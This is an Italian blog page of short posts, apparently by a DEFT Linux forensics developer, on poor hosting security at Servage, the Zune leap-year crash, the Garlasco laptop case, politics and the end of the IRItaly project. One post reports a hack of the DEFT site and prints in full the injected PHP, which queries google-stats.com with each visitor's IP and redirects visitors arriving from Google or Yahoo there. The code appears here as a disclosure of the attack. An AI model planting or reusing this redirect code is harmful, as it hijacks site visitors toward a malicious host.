Hosting – Servage sempre più scadente

3
3 years ago
by Steve in

Creative Commons License credit: Jason Gulledge

Da più di due anni sono cliente del servizio di hosting offerto da Servage, azienda del gruppo Tukovs che a fronte di un prezzo abbastanza onesto, offre sulla carta un servizio di hosting niente mala. Mai avuto problemi! Sono sempre stato soddisfatto del servizio offerto tantè che l’ho consigliato ad alcuni miei colleghi.

Da 6 mesi però la favola sembra essere finita. Affermo questo perchè sembra che l’ufficio sicurezza sia andato in ferie perenne! I loro server sono diventati dei colabrodi. Posso scolarci la pasta la sera! Sostanzialmente mi trovo molto spesso delle injection di tag in molte pagine, sia che esse siano di cms sia in siti web statici in html. Ovviamente ho controllato tutte le falle che potrebbero riguardarmi ed ho eseguito il Pascucci WP test senza alcun riscontro rilevante…!

Il loro servizio di ticketing è superficiale e irritante. Rispondono con palesi copia e incolla. L’operatore non è persona competente in materia tantè che molto spesso vengo “girato” a più operatori che provano a rispondere alle mie affermazioni con frasi tipo “leggi il readme dello script che usi”… quando non uso alcuno script o_O”.

Terrificante! Sto rimpiangendo il buon e vecchio aruba.it

Loacker che bontà…

1
3 years ago
by Steve in

Questa mattina sono stato informato da Enrico Ardizzoni che il sito di DEFT (e anche questo blog, l’ho appena scoperto) è stato oggetto di un attacco tipo quello descritto nel blog di Mario Pascucci.

Effettivamente in questi ultimi giorni avevo notato un netto calo degli accessi ma avevo attribuito la colpa alle feste che ormai stanno giungendo al termine. E invece no! Di seguito la simpatica injection:

<?php function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents(“http://google-stats.com/ip.php?ip=$ip”);if($uniq===false){return false;}if($uniq==”go”){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,”google”)!==false)and(strpos($ref,”bot.htm”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,”yahoo”)!==false)and(strpos($ref,”slurp”)===false)){if(get_counter()){@header(“Location: http://google-stats.com/tds_u.php?dname=”.$_SERVER['HTTP_HOST']);die();}} ?>

Ho capito che è proprio in questi giorni che bisogna tenere la guardia ancora più alta evitando di “abbandonare” del tutto il mondo della rete proprio come ho fatto io.

Mannaggia mannaggia…. sti wafer non sanno proprio che fare :-)

Svegliamoci un po tutti

0
3 years ago
by Steve in

Non mi piace parlare molto di politica, ma quanto sto per riportare secondo me dovrebbe far aprire gli occhi a tutti.

Sono e sarò sempre una persona moderata dal punto di vista politico. Ho sempre cercato di comprendere (e dove possibile giustificare) fino in fondo le scelte che uno schieramento politico, regolarmente eletto dal popolo, decide di portare avanti. Ma quanto sto per riportare, proprio non ce la faccio a comprenderlo. Ok il federalismo fiscale… magnifico! Lo appoggio al 100% (ma perchè poi togliere l’ici? Boh!?)! Ma questa nuova crociata…. a che pro per NOI?

Marco Damilano ha pubblicato un interessante articolo sull’Espresso dal titolo “Costituzione ad personam”. Vi invito a leggerlo con molta attenzione. Questa volta si sta veramente esagerando scherzando con il fuoco.

“Auspico” (termine usato con eccesso dalla nostra classe politica che invece di auspicare dovrebbe agire) che nell’immediato futuro politico del nostro paese qualcosa cambi ad incominciare dal popolo italiano che deve darsi una bella svegliata a destra, a sinistra e al centro!

Zune è proprio un burlone!

0
3 years ago
by Steve in

Creative Commons License credit: guybo

Un simpaticissimo articolo su Macprof parla del problema della gestione dell’anno bisestile presente nei nuovi lettori mp3 della Microsoft… il “temutissimo” zune!

Riporto la parte più comica:

In breve: il 31 dicembre una buona parte degli Zune commercializzati, circa 1 milioni di possessori del primo modello da 30 Gigabyte sui tre milioni venduti in tutto negli Usa, hanno smesso di funzionare. Per 24 ore non c’è stato verso: accendere, spegnere, resettare, tirare, spingere, sbattere. Lo Zune era come morto, testimoniano anche i più immarcescibili tra i pasdaràn del mattone made in Redmond.

Il problema era l’ennesimo baco nel software compilato da Microsoft. Lo Zune, in buona sostanza, non sa cosa siano gli anni bisestili. Quando si trova di fronte a un anno come il 2008, che aveva febbraio di 29 giorni, arrivato alla sera del 30 dicembre si sente pronto a cambiare e passare all’anno successivo. Peccato che il calendario programmato all’interno del software gli dica che c’è ancora un giorno che appartiene ai 12 mesi con la data precedente. E lui, il piccolo mattoncino di Microsoft, per non saper né leggere né scrivere cosa fa? S’impianta. E non fa più niente. Crasha.

Meraviglioso :-)

Caso Garlasco – L’ennesima perizia sul computer di Stasi

0
3 years ago
by Steve in

Siamo all’ennesima perizia. Ormai il caso Garlasco si sta concentrando sulle evidence del portatile di Alberto Stasi. Personalmente sto apprezzando molto il metodo usato dall’avvocato, cioè quello di trasformare il computer portatile del suo assistito in un vero e proprio testimone “parlante”.

Questi ed altri casi simili sono gli episodi chiave che portano all’alfabetizzazione informatico forense all’interno delle aule dei tribunali.

Nello schema sopra riportato però manca il portatile di Stasi…. l’informazione italiana è sempre un passo dietro a tutto.

In risposta al punto uno

4
3 years ago
by Steve in

Creative Commons License credit: Alin_F

Dario Forte, uno dei primissimi nel trattare la Computer Forensics in Italia, in un post fatto nel suo blog annuncia la chiusura del progetto IRItaly affermando anche qualcosa che personalmente non reputo esatta, nel dettaglio:

i Cd di IRItaly, nelle tre versioni, saranno ancora disponibili, ma non riceveranno ulteriore supporto (end of life). Si tratta di un progetto nato ormai sei anni or sono. In questo periodo assistiamo con piacere ad una serie di emulazioni, molte delle quali non presentano, a nostro parere, nulla di innovativo e, al contempo, per la loro impostazione, generano forti dubbi in materia di validazione forense. Al momento in cui scriviamo, nel nostro paese, abbiamo contato almeno quattro distribuzioni che “rielaborano” quanto consolidato da IRItaly ormai sei anni fa.

Personalmente parlando mi sento di affermare che non ho preso spunto da IRItaly (anche perchè non lo conoscevo ancora il progetto ai tempi) e ne ho rielaborato idee provenienti dal suo team. DEFT Linux nacque tre anni fa da suggerimenti e consigli del Dr. Donato Caccavella e il prof. Cesare Maioli per il corso di Informatica Forense per la facoltà di Giurisprudenza a Bologna… poi si è evoluto nel team di sviluppo che oggi conoscete tutti; soffermandomi sul concetto di rielaborazioni, ricordo che DEFT è basata sul progetto Ubuntu e non ha mai cambiato tendenza, a differenza di IRItaly che invece è mutata negli anni cambiando la distribuzione “core” su cui basarsi… per non parlare dei progetti che ne sono nati come il velocissimo Dhash (il più veloce hash calculator esistente al mondo), Xplico (il primo analizzatore avanzato di traffico su rete ip disponibile sotto licenza gpl (non molti sanno ma ci sono stati contatti con Cisco che Gianluca Costa ha gestito direttamente)), DeeeFT (prima distribuzione forense per netbook eeepc) ecc…

Se proprio vogliamo parlare di emulazioni, DEFT stessa si dovrebbe sentire emulata dato che è stata la distribuzione “pioniera” che ha fatto cambiare core di sviluppo a distribuzioni come Helix & co.

Ma va bene tutto, non ci facciamo di certo problemi per queste leggerezze :-)

Go to Top